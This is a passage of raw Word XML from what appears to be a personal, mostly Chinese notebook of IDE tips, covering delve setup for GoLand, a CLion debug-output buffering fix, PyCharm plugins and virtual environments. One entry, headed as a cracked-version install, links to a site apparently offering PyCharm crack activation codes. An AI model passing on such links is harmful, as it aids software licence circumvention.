        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $ cd delve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A9FEF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $ go install github.com/go-delve/delve/cmd/dlv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271669D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E74B07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随后在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GOPATH/bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中出现最新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dlv.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，注意看该程序的生成时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413610ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goland</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的“自定义属性”中设置该值：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52343594" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dlv.path=E:\\BiLing\\golang-study\\bin\\dlv.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F854AB" w14:textId="6E0F29B1" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goland</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>奏效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD4FF29" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40902FAE" w14:textId="77777777" w:rsidR="00AF49EF" w:rsidRDefault="00AF49EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7584F62A" w14:textId="77777777" w:rsidR="00AF49EF" w:rsidRDefault="00AF49EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4842DA3C" w14:textId="77777777" w:rsidR="00AF49EF" w:rsidRDefault="00AF49EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DADC544" w14:textId="5EDE343A" w:rsidR="00AF49EF" w:rsidRDefault="00AF49EF" w:rsidP="00AF49EF">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Rust</w:t>
      </w:r>
      <w:r w:rsidR="00831D41">
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>over调试技巧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCCB6A3" w14:textId="77777777" w:rsidR="00AF49EF" w:rsidRDefault="00AF49EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="137B5663" w14:textId="77777777" w:rsidR="00AF49EF" w:rsidRDefault="00AF49EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51538E88" w14:textId="69F56A32" w:rsidR="00422E55" w:rsidRDefault="00537C6E" w:rsidP="00537C6E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Clion调试技巧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64800B58" w14:textId="77777777" w:rsidR="00422E55" w:rsidRDefault="00422E55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6151B297" w14:textId="077EB1C3" w:rsidR="00422E55" w:rsidRDefault="0099463E" w:rsidP="0099463E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Output is missing </w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uring Debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020DB5E6" w14:textId="77777777" w:rsidR="004656F1" w:rsidRDefault="004656F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40417AD9" w14:textId="1DC27C5D" w:rsidR="005F19AE" w:rsidRDefault="004656F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>problem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77368F94" wp14:editId="4DD5E6CA">
            <wp:extent cx="5274310" cy="3056890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="971920741" name="图片 1" descr="电脑萤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20741" name="图片 1" descr="电脑萤幕截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId282"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3056890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E8CC80" w14:textId="77777777" w:rsidR="005F19AE" w:rsidRDefault="005F19AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6477DC18" w14:textId="4B3DB5AC" w:rsidR="00C46059" w:rsidRPr="00F908AC" w:rsidRDefault="00F908AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>This is because of the Clion</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">s console terminal, it </w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>as a large buff of output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B2E7BC" w14:textId="77777777" w:rsidR="00C46059" w:rsidRDefault="00C46059" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0897A541" w14:textId="75885B1A" w:rsidR="00537C6E" w:rsidRDefault="004656F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>How to fix it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478018EA" w14:textId="77777777" w:rsidR="004656F1" w:rsidRDefault="004656F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37094015" w14:textId="129C9A01" w:rsidR="004656F1" w:rsidRDefault="004656F1" w:rsidP="004656F1">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Method 1</w:t>
      </w:r>
      <w:r w:rsidR="00F908AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> insert output buf code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A352A6" w14:textId="6ABA4883" w:rsidR="004656F1" w:rsidRDefault="00866D4F" w:rsidP="004656F1">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t the beginning of the text file, add the code below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5684C2E1" w14:textId="77777777" w:rsidR="00866D4F" w:rsidRDefault="00866D4F" w:rsidP="004656F1"/>
    <w:p w14:paraId="5E8462D8" w14:textId="3E3509B4" w:rsidR="004656F1" w:rsidRDefault="00866D4F" w:rsidP="004656F1">
      <w:r w:rsidRPr="00866D4F">
        <w:t>setbuf(stdout, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453A232B" w14:textId="77777777" w:rsidR="004656F1" w:rsidRDefault="004656F1" w:rsidP="004656F1"/>
    <w:p w14:paraId="77EF2F5D" w14:textId="394AAD02" w:rsidR="004656F1" w:rsidRDefault="004656F1" w:rsidP="004656F1">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Method 2</w:t>
      </w:r>
      <w:r w:rsidR="00F908AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> external terminal during debug(Recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3FFE1D" w14:textId="77777777" w:rsidR="004656F1" w:rsidRDefault="004656F1" w:rsidP="004656F1"/>
    <w:p w14:paraId="364AF3CF" w14:textId="605D37C6" w:rsidR="00866D4F" w:rsidRPr="004656F1" w:rsidRDefault="00866D4F" w:rsidP="004656F1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Edit the run configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ED9467" w14:textId="608D7B8E" w:rsidR="00537C6E" w:rsidRDefault="00866D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EC9E435" wp14:editId="6B4C5ACD">
            <wp:extent cx="5274310" cy="3500755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="452137200" name="图片 1" descr="电脑游戏的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37200" name="图片 1" descr="电脑游戏的屏幕截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId283"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3500755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F899B9" w14:textId="370365FB" w:rsidR="00422E55" w:rsidRPr="002D5A51" w:rsidRDefault="00866D4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ick on the </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Run in external console</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="002D5A51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, and click </w:t>
      </w:r>
      <w:r w:rsidR="002D5A51">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="002D5A51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apply</w:t>
      </w:r>
      <w:r w:rsidR="002D5A51">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D7647" w14:textId="77777777" w:rsidR="00422E55" w:rsidRDefault="00422E55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0811A250" w14:textId="69ED2136" w:rsidR="002D5A51" w:rsidRDefault="00C46059" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49200469" wp14:editId="5696D444">
            <wp:extent cx="5274310" cy="3127375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="109996029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60297" name="图片 1" descr="文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId284"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3127375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D6BFDD" w14:textId="77777777" w:rsidR="002D5A51" w:rsidRPr="002D5A51" w:rsidRDefault="002D5A51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="224D95F9" w14:textId="64E8D24D" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="829" w:name="_Toc159780249"/>
      <w:r>
        <w:t>pycharm技巧</w:t>
      </w:r>
      <w:bookmarkEnd w:id="829"/>
    </w:p>
    <w:p w14:paraId="078ABE94" w14:textId="77777777" w:rsidR="00510B09" w:rsidRDefault="00510B09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E7FDCAA" w14:textId="5184382D" w:rsidR="00510B09" w:rsidRDefault="003F7EBD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="830" w:name="_Toc159780250"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>破解版安装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="830"/>
    </w:p>
    <w:p w14:paraId="533F38C4" w14:textId="77777777" w:rsidR="003F7EBD" w:rsidRDefault="003F7EBD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="105FF2F4" w14:textId="145A673C" w:rsidR="003F7EBD" w:rsidRPr="003F7EBD" w:rsidRDefault="003F7EBD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003F7EBD">
        <w:t>pycharm: https://www.exception.site/essay/pycharm-pojie-jihuoma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360263A9" w14:textId="77777777" w:rsidR="00510B09" w:rsidRDefault="00510B09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4580CF34" w14:textId="03F9F1FF" w:rsidR="00105133" w:rsidRDefault="00105133" w:rsidP="00105133">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件推荐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB9D4BA" w14:textId="77777777" w:rsidR="00105133" w:rsidRDefault="00105133" w:rsidP="00105133"/>
    <w:p w14:paraId="48403B32" w14:textId="4F6AA202" w:rsidR="00105133" w:rsidRDefault="00105133" w:rsidP="00105133">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汉化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA76668" w14:textId="40505379" w:rsidR="00105133" w:rsidRDefault="00105133" w:rsidP="00105133">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>statistic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ACAC1B" w14:textId="183C0BE6" w:rsidR="00105133" w:rsidRPr="00105133" w:rsidRDefault="000D3045" w:rsidP="00105133">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rainbow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> brackets</w:t>
      </w:r>
      <w:r w:rsidR="00321A35">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00321A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分功能</w:t>
      </w:r>
      <w:r w:rsidR="00321A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00321A35">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00321A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>天限制，经常让你买注册码，已弃用</w:t>
      </w:r>
      <w:r w:rsidR="00321A35">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8B405F" w14:textId="68B30B89" w:rsidR="00105133" w:rsidRDefault="000D3045" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>arkdown</w:t>
      </w:r>
      <w:r w:rsidR="00C1604C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（其实</w:t>
      </w:r>
      <w:r w:rsidR="00C1604C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vscode</w:t>
      </w:r>
      <w:r w:rsidR="00C1604C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00C1604C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>md</w:t>
      </w:r>
      <w:r w:rsidR="00C1604C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阅览比</w:t>
      </w:r>
      <w:r w:rsidR="00C1604C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:r w:rsidR="00C1604C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的要很快，这个自行选择）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152019D6" w14:textId="6F8BD1FE" w:rsidR="000D3045" w:rsidRDefault="00390D41" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> glance (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强烈推荐，右侧滚动条变小地图</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FB52DD" w14:textId="670DD944" w:rsidR="00390D41" w:rsidRDefault="00390D41" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>translation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7456B6A7" w14:textId="77777777" w:rsidR="00105133" w:rsidRDefault="00105133" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A12BEA5" w14:textId="5CE6BABB" w:rsidR="00510B09" w:rsidRDefault="00510B09" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="831" w:name="_Toc159780251"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器和虚拟环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="831"/>
    </w:p>
    <w:p w14:paraId="41F4D30F" w14:textId="77777777" w:rsidR="0031365A" w:rsidRDefault="0031365A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1A8DDA" w14:textId="04EC09E2" w:rsidR="0031365A" w:rsidRPr="0031365A" w:rsidRDefault="00CC5637" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="832" w:name="_Toc159780252"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚</w:t>
      </w:r>
      <w:r w:rsidR="0031365A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拟解释器和机器系统的解释器不同，包环境不同</w:t>
      </w:r>
      <w:bookmarkEnd w:id="832"/>
    </w:p>
    <w:p w14:paraId="505436CF" w14:textId="11A33B23" w:rsidR="00510B09" w:rsidRDefault="00510B09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个新的项目，会想创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>venv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的虚拟解释器和库包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C807C" w14:textId="56521363" w:rsidR="00510B09" w:rsidRDefault="00510B09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会根据系统现有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制一个</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B27F476" w14:textId="68435D82" w:rsidR="00510B09" w:rsidRDefault="00510B09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是库文件是不同的，因为环境不同，如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1C25A" w14:textId="77777777" w:rsidR="00510B09" w:rsidRDefault="00510B09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7862B7D9" w14:textId="761C4B54" w:rsidR="00510B09" w:rsidRDefault="000E6670" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3682D412" wp14:editId="0ACE23B0">
            <wp:extent cx="5274310" cy="1328420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="50214109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41093" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId285"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1328420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F2149C" w14:textId="77777777" w:rsidR="00510B09" w:rsidRDefault="00510B09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78BCF869" w14:textId="77777777" w:rsidR="00510B09" w:rsidRDefault="00510B09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0217DCDE" w14:textId="152FD5FE" w:rsidR="0031365A" w:rsidRDefault="0031365A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="833" w:name="_Toc159780253"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手动安装包环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="833"/>
    </w:p>
    <w:p w14:paraId="3A61FF47" w14:textId="77777777" w:rsidR="0031365A" w:rsidRDefault="0031365A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
